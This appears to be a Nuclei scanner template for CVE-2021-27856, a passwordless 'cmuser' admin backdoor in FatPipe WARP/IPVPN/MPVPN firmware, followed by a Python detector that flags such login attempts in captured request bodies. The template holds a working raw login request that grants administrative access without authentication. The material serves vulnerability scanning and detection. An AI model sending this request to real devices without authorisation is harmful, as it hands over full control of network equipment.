FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contains an account named "cmuser" with administrative privileges and no password, which lets attackers gain unauthorized administrative access. Exploitation requires no authentication.
PoC code [public]
id: CVE-2021-27856

info:
  name: FatPipe WARP/IPVPN/MPVPN - Backdoor Account
  author: gy741
  severity: critical
  description: |
    FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain an account named "cmuser" with administrative privileges and no password, letting attackers gain unauthorized admin access, exploit requires no authentication.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
    - https://www.fatpipeinc.com/support/advisories.php
    - https://www.fatpipeinc.com/support/cve-list.php
    - https://www.zeroscience.mk/codes/fatpipe_backdoor.txt
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-27856
    cwe-id: NVD-CWE-Other
    epss-score: 0.57408
    epss-percentile: 0.98037
    cpe: cpe:2.3:o:fatpipeinc:warp_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fatpipeinc
    product: warp_firmware
  tags: cve,cve2021,fatpipe,default-login,backdoor,auth-bypass,vkev,vuln

http:
  - raw:
      - |
        POST /fpui/loginServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "application/json"
        part: header

      - type: word
        words:
          - '"loginRes":"success"'
          - '"activeUserName":"cmuser"'
        condition: and
# digest: 4a0a0047304502210093e4764ff60525b8f3404f36153a334ef1c19774688405b44ada2068987bbc47022029e6d07fd2dd984b319382d06d1708cfd62149034781940ff056be8dee785eba:922c64590222798bb761d5b6d8e72950
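
A defender-side check for the request shown in the template, as an added example that is not part of the original template or of FatPipe's code: it decodes the `loginParams` form field from logged request bodies and flags login attempts that name `cmuser`. The log record schema (`src`, `method`, `path`, `body`) and the sample records are assumptions constructed for illustration.

```python
import json
from urllib.parse import parse_qs

LOGIN_PATH = "/fpui/loginServlet"  # endpoint taken from the template above
BACKDOOR_USER = "cmuser"           # account named in the advisory

def classify_login(method, path, body):
    """Return 'backdoor-empty-password', 'backdoor-user', or None for one request."""
    if method.upper() != "POST" or path.split("?", 1)[0] != LOGIN_PATH:
        return None
    # parse_qs URL-decodes the form body; keep_blank_values keeps empty fields
    fields = parse_qs(body, keep_blank_values=True)
    for raw in fields.get("loginParams", []):
        try:
            params = json.loads(raw)
        except ValueError:
            continue  # malformed JSON cannot be classified
        if not isinstance(params, dict):
            continue
        # Case-folded comparison is a deliberately conservative over-match
        if str(params.get("username", "")).strip().lower() != BACKDOOR_USER:
            continue
        if params.get("password") in ("", None):
            return "backdoor-empty-password"
        return "backdoor-user"
    return None

def scan(records):
    """records: dicts with src, method, path, body (hypothetical log schema)."""
    hits = []
    for rec in records:
        verdict = classify_login(rec["method"], rec["path"], rec["body"])
        if verdict:
            hits.append((rec["src"], verdict))
    return hits

# Constructed sample records, not real traffic; sources are documentation ranges.
SAMPLE = [
    {"src": "192.0.2.10", "method": "POST", "path": LOGIN_PATH,
     "body": "loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D"},
    {"src": "198.51.100.7", "method": "POST", "path": LOGIN_PATH,
     "body": "loginParams=%7B%22username%22%3A%22admin%22%2C%22password%22%3A%22x%22%2C%22authType%22%3A0%7D"},
    {"src": "203.0.113.5", "method": "POST", "path": LOGIN_PATH, "body": "loginParams=%7Bnot-json"},
    {"src": "203.0.113.9", "method": "GET", "path": "/", "body": ""},
]

if __name__ == "__main__":
    for src, verdict in scan(SAMPLE):
        print(src, verdict)
```

This only works where request bodies are captured, for example at a reverse proxy or WAF in front of the management interface; standard access logs do not record the POST body.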